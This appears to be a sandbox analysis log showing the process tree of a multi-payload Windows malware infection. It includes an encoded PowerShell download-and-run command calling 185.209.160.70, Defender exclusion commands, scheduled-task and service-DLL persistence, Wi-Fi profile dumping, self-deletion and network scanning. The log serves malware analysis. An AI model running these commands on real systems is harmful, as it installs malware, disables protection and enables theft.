C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵PID:3732
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1244 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 2644⤵
- Program crash
PID:4372
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe"C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2468 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:64
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Terraria-Multiplayer-Fix-Online.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Terraria-Multiplayer-Fix-Online" /tr "C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1860
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Organiser.exe"C:\Users\Admin\AppData\Local\Temp\Files\Organiser.exe"3⤵
- Executes dropped EXE
PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force4⤵PID:40728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Final.exe"C:\Users\Admin\AppData\Local\Temp\Files\Final.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2476 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5320 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:5140
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4984
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"6⤵PID:5116
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"5⤵PID:3452
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:5056
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid6⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4076
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"6⤵PID:3604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe"5⤵PID:39968
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:40020
-
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
- Delays execution with timeout.exe
PID:40040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"3⤵
- Executes dropped EXE
PID:43908 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"4⤵PID:23808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"5⤵
- Command and Scripting Interpreter: PowerShell
PID:39032
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"4⤵PID:40116
-
C:\Windows\System32\usvcinsta64.exe"C:\Windows\System32\usvcinsta64.exe"5⤵
- Executes dropped EXE
PID:40164 -
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"6⤵PID:40384
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"7⤵
- Command and Scripting Interpreter: PowerShell
PID:40684
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"6⤵PID:11884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"7⤵
- Command and Scripting Interpreter: PowerShell
PID:11612
-
-
-
C:\Windows\System32\cmd.execmd.exe /c mkdir "\\?\C:\Windows \System32"6⤵PID:10012
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "C:\Windows \System32\printui.exe"6⤵PID:9868
-
C:\Windows \System32\printui.exe"C:\Windows \System32\printui.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:9760 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"8⤵PID:9668
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"9⤵
- Command and Scripting Interpreter: PowerShell
PID:9472
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc create x738946 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x738946\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x738946.dat" /f && sc start x7389468⤵PID:8412
-
C:\Windows\system32\sc.exesc create x738946 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto9⤵
- Launches sc.exe
PID:8312
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\services\x738946\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x738946.dat" /f9⤵
- Server Software Component: Terminal Services DLL
- Modifies registry key
PID:8264
-
-
C:\Windows\system32\sc.exesc start x7389469⤵
- Launches sc.exe
PID:8232
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\console_zero.exe"8⤵PID:8028
-
C:\Windows\System32\console_zero.exe"C:\Windows\System32\console_zero.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7908 -
C:\Windows\System32\cmd.execmd.exe /c schtasks /delete /tn "console_zero" /f10⤵
- Indicator Removal: Clear Persistence
PID:19452 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn "console_zero" /f11⤵PID:19356
-
-
-
C:\Windows\System32\cmd.execmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f10⤵PID:18556
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:18316
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"8⤵PID:19044
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak9⤵
- Delays execution with timeout.exe
PID:18740
-
-
-
-
-
C:\Windows\System32\cmd.execmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"6⤵PID:9712
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak7⤵
- Delays execution with timeout.exe
PID:9528
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del "C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"4⤵PID:40240
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
PID:40676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Operation6572.exe"C:\Users\Admin\AppData\Local\Temp\Files\Operation6572.exe"3⤵
- Executes dropped EXE
PID:7588 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6632
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pered.exe"C:\Users\Admin\AppData\Local\Temp\Files\pered.exe"3⤵
- Executes dropped EXE
PID:40276 -
C:\Users\Admin\AppData\Local\Temp\Files\pered.exe"C:\Users\Admin\AppData\Local\Temp\Files\pered.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:40812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:40900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe"C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:11956
-
-
C:\Users\Admin\AppData\Local\Temp\Files\client.exe"C:\Users\Admin\AppData\Local\Temp\Files\client.exe"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Windows directory
PID:11724 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:11700
-
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fh-oz4em.cmdline"4⤵PID:15452
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD97A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD979.tmp"5⤵PID:15372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\r2.exe"C:\Users\Admin\AppData\Local\Temp\Files\r2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:17992
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"3⤵
- Executes dropped EXE
PID:12504
-
-
C:\Users\Admin\AppData\Local\Temp\Files\config.exe"C:\Users\Admin\AppData\Local\Temp\Files\config.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:9252
-
-
C:\Users\Admin\AppData\Local\Temp\Files\actives.exe"C:\Users\Admin\AppData\Local\Temp\Files\actives.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:8552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe2024112061012920.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:8304 -
C:\Windows\SysWOW64\schtasks.exeSchtasks.Exe /delete /tn "Maintenance" /f5⤵PID:8068
-
-
C:\Windows\SysWOW64\schtasks.exeSchtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx2024112061012920.xml"5⤵
- Scheduled Task/Job: Scheduled Task
PID:8012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb2024112061012920.bat" "4⤵PID:8316
-
C:\Windows\SysWOW64\chcp.comchcp 12515⤵PID:8136
-
-
C:\Users\Admin\AppData\Local\Temp\Files\actives.exe"C:\Users\Admin\AppData\Local\Temp\Files\actives.exe"5⤵
- Executes dropped EXE
PID:8020 -
C:\Users\Admin\AppData\Roaming\Photos.exe"C:\Users\Admin\AppData\Roaming\Photos.exe" C:\Users\Admin\AppData\Local\Temp\Files\actives.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5784 -
C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe"C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe" unk7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4732 -
C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe"C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe" unk28⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:24224 -
C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe" unk39⤵
- Executes dropped EXE
PID:24436 -
C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe"C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe" execute10⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:24500 -
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1011⤵PID:11244
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10792
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4711⤵PID:18056
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:11368
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.811⤵PID:11212
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10668
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4511⤵PID:10720
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10836
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1111⤵PID:10692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:11036
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4811⤵PID:10828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10208
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.711⤵PID:10896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:11012
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4411⤵PID:10632
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10640
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4911⤵PID:10672
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10180
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1211⤵PID:10736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10940
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4311⤵
- Discovers systems in the same network
PID:10784 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10204
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.611⤵PID:11400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:9992
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5011⤵
- Discovers systems in the same network
PID:11916 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:9908
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1311⤵PID:10200
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:19052
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4211⤵PID:10244
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:9380
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5111⤵PID:11004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:24060
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.511⤵PID:38860
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:9936
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4111⤵
- Discovers systems in the same network
PID:10048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:24048
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1411⤵
- System Location Discovery: System Language Discovery
PID:10032 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:9716
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.411⤵
- System Location Discovery: System Language Discovery
PID:9960 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:13520
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1511⤵
- System Location Discovery: System Language Discovery
PID:6968 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:6932
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5211⤵
- Discovers systems in the same network
PID:7072 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:7100
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.311⤵PID:21592
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:19800
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.4011⤵PID:7292
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:7296
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1611⤵PID:19848
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:7104
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5311⤵PID:6960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:7304
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.211⤵
- Discovers systems in the same network
PID:6980 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:7124
-
-
-
